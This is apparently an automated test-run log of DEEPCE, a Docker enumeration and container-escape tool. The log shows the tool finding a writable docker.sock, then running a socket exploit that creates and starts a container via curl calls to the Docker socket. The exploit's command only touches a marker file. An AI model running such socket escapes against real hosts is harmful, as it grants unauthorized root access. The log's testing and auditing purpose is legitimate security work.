results/docker-alpine-payload-command.log


                      ##         .
                ## ## ##        ==
             ## ## ## ##       ===
         /"""""""""""""""""\___/ ===
    ~~~ {~~ ~~~~ ~~~ ~~~~ ~~~ ~ /  ===- ~~~
         \______ X           __/
           \    \         __/
            \____\_______/
          __
     ____/ /__  ___  ____  ________
    / __  / _ \/ _ \/ __ \/ ___/ _ \   ENUMERATE
   / /_/ /  __/  __/ /_/ / (__/  __/  ESCALATE
   \__,_/\___/\___/ .___/\___/\___/  ESCAPE
                 /_/

 Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
 by stealthcopter

==========================================( Colors )==========================================
[+] Exploit Test ............ Exploitable - Check this out
[+] Basic Test .............. Positive Result
[+] Another Test ............ Error running check
[+] Negative Test ........... No
[+] Multi line test ......... Yes
Command output
spanning multiple lines

Tips will look like this and often contains links with additional info. You can usually 
ctrl+click links in modern terminal to open in a browser window
See https://stealthcopter.github.io/deepce

===================================( Installing Packages )====================================
fetch https://dl-cdn.alpinelinux.org/alpine/v3.20/main/x86_64/APKINDEX.tar.gz
fetch https://dl-cdn.alpinelinux.org/alpine/v3.20/community/x86_64/APKINDEX.tar.gz
(1/34) Installing fstrm (0.6.1-r4)
(2/34) Installing krb5-conf (1.0-r2)
(3/34) Installing libcom_err (1.47.0-r5)
(4/34) Installing keyutils-libs (1.6.3-r3)
(5/34) Installing libverto (0.3.2-r2)
(6/34) Installing krb5-libs (1.21.2-r0)
(7/34) Installing json-c (0.17-r0)
(8/34) Installing nghttp2-libs (1.62.0-r0)
(9/34) Installing protobuf-c (1.5.0-r0)
(10/34) Installing libuv (1.48.0-r0)
(11/34) Installing xz-libs (5.6.1-r3)
(12/34) Installing libxml2 (2.12.7-r0)
(13/34) Installing bind-libs (9.18.27-r0)
(14/34) Installing bind-tools (9.18.27-r0)
(15/34) Installing ca-certificates (20240226-r0)
(16/34) Installing brotli-libs (1.1.0-r2)
(17/34) Installing c-ares (1.28.1-r0)
(18/34) Installing libunistring (1.2-r0)
(19/34) Installing libidn2 (2.3.7-r0)
(20/34) Installing libpsl (0.21.5-r1)
(21/34) Installing zstd-libs (1.5.6-r0)
(22/34) Installing libcurl (8.7.1-r0)
(23/34) Installing curl (8.7.1-r0)
(24/34) Installing libcap2 (2.70-r0)
(25/34) Installing libcap-getcap (2.70-r0)
(26/34) Installing libcap-setcap (2.70-r0)
(27/34) Installing libcap-utils (2.70-r0)
(28/34) Installing libcap (2.70-r0)
(29/34) Installing libgcc (13.2.1_git20240309-r0)
(30/34) Installing lua5.4-libs (5.4.6-r1)
(31/34) Installing libpcap (1.10.4-r1)
(32/34) Installing libssh2 (1.11.0-r2)
(33/34) Installing libstdc++ (13.2.1_git20240309-r0)
(34/34) Installing nmap (7.95-r0)
Executing busybox-1.36.1-r28.trigger
Executing ca-certificates-20240226-r0.trigger
OK: 36 MiB in 48 packages
===================================( Enumerating Platform )===================================
[+] Inside Container ........ Yes
[+] Container Platform ...... docker
[+] Container tools ......... None
[+] User .................... root
[+] Groups .................. root bin daemon sys adm disk wheel floppy dialout tape video
[+] Sudoers ................. No
[+] Docker Executable ....... Not Found
[+] Docker Sock ............. Yes
srw-rw----    1 root     127            0 Jun  5 15:20 /var/run/docker.sock
[+] Sock is writable ........ Yes
The docker sock is writable, we should be able to enumerate docker, create containers 
and obtain root privs on the host machine
See https://stealthcopter.github.io/deepce/guides/docker-sock.md

To see full info from the docker sock output run the following

curl -s --unix-socket /var/run/docker.sock http://localhost/info

KernelVersion:6.5.0-1021-azure
OperatingSystem:Ubuntu 22.04.4 LTS
OSType:linux
Architecture:x86_64
NCPU:4
DockerRootDir:/var/lib/docker
Name:fv-az770-257
ServerVersion:24.0.9
[+] Docker Version .......... 24.0.9
[+] CVE–2019–13139 .......... No
[+] CVE–2019–5736 ........... No
==================================( Enumerating Container )===================================
[+] Container ID ............ 5db364421af4
[+] Container Full ID ....... /
[+] Container Name .......... Could not get container name through reverse DNS
[+] Container IP ............ 172.17.0.2
[+] DNS Server(s) ........... 168.63.129.16 
[+] Host IP ................. 172.17.0.1
[+] Operating System ........ Linux
[+] Kernel .................. 6.5.0-1021-azure
[+] Arch .................... x86_64
[+] CPU ..................... AMD EPYC 7763 64-Core Processor
[+] Useful tools installed .. Yes
/usr/bin/curl
/usr/bin/wget
/usr/bin/nc
/usr/bin/nslookup
/usr/bin/host
/bin/hostname
/usr/bin/dig
/usr/bin/nmap
[+] Dangerous Capabilities .. Yes
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read,!cap_perfmon,!cap_bpf,!cap_checkpoint_restore
[+] SSHD Service ............ No
[+] Privileged Mode ......... No
[+] Alpine Linux Version .... 3.20.0
[+] └── CVE-2019-5021 ....... No
====================================( Enumerating Mounts )====================================
[+] Docker sock mounted ....... Yes
The docker sock is writable, we should be able to enumerate docker, create containers 
and obtain root privs on the host machine
See https://stealthcopter.github.io/deepce/guides/docker-sock.md

[+] Other mounts .............. Yes
/home/runner/work/deepce/deepce/deepce.sh /root/deepce.sh rw,relatime - ext4 /dev/root rw,discard,errors=remount-ro
[+] Possible host usernames ... runner 
====================================( Interesting Files )=====================================
[+] Interesting environment variables ... No
HOME=/root
HOSTNAME=5db364421af4
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
SHLVL=1
[+] Any common entrypoint files ......... Yes
-rwxr-xr-x    1 1001     127        38.5K Jun  5 15:23 /root/deepce.sh
[+] Interesting files in root ........... No
[+] Passwords in common files ........... No
[+] Home directories .................... No
[+] Hashes in shadow file ............... No
[+] Searching for app dirs .............. 
==================================( Enumerating Containers )==================================
By default containers can communicate with other containers on the same network and the 
host machine, this can be used to enumerate further

TODO Enumerate container using sock
=====================================( Exploiting Sock )======================================

[+] Preparing Exploit  
[+] Exploit Type ............. Custom Command
[+] Custom Command ........... touch /tmp/deepce-docker-alpine-payload-command.hacked
[+] Clean up ................. Automatic on container exit

[+] Creating container ..... 22e1368009153719af243401dae8de84649bcbeef404c35b228df6efaa4f60ca
[+] If the shell dies you can restart your listener and run the start command to fire it again 
Start Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/22e1368009153719af243401dae8de84649bcbeef404c35b228df6efaa4f60ca/start
Logs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/22e1368009153719af243401dae8de84649bcbeef404c35b228df6efaa4f60ca/logs?stderr=1&stdout=1" --output -
[+] Once complete remember to tidy up by stopping and removing your container with following commands 
Stop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/22e1368009153719af243401dae8de84649bcbeef404c35b228df6efaa4f60ca/stop
Remove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/22e1368009153719af243401dae8de84649bcbeef404c35b228df6efaa4f60ca
[+] Starting container ..... Success
[+] Sleeping for ........... 2s
[+] Fetching logs .......... Success
[+] Exploit completed ..... :)
==============================================================================================